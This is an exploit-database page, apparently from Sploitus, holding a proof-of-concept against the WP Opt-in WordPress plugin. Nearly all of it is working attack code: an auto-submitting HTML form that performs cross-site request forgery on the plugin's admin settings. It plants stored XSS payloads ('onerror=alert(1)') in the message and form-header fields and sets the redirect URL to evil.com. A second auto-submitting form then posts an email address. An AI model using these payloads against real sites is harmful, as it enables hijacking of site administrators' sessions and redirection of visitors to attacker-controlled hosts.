Share
## https://sploitus.com/exploit?id=WPEX-ID:46B634F6-92BC-4E00-A4C0-C25135C61922
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-opt-in%2Fwp-opt-in.php" method="POST">
    <input type="text" name="wpoi_hidden" value="SAb13c">
    <input type="text" name="wpoi_email_from" value="test@example.com">
    <input type="text" name="wpoi_email_subject" value="[example.com] Requested e-mail">
    <input type="text" name="wpoi_email_message" value="hacked">
    <input type="text" name="wpoi_email_notify" value="">
    <input type="text" name="wpoi_msg_bad" value="<p><b>Bad e-mail address.</b></p>">
    <input type="text" name="wpoi_msg_fail" value="<p><b>Failed sending to e-mail address.</b></p>">
    <input type="text" name="wpoi_msg_sent" value="<img src=x onerror=alert(1)>">
    <input type="text" name="wpoi_form_header" value="<img src=x onerror=alert(1)>">
    <input type="text" name="wpoi_form_footer" value="</div>">
    <input type="text" name="wpoi_form_email" value="E-mail:">
    <input type="text" name="wpoi_form_send" value="Submit">
    <input type="text" name="wpoi_url_redir" value="https://evil.com">
    <input type="text" name="Submit" value="Update Options ยป">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/asasas" method="POST">
    <input type="text" name="wpoi_email" value="test@example.com">
</form>
<script>
    document.getElementById("test").submit();
</script>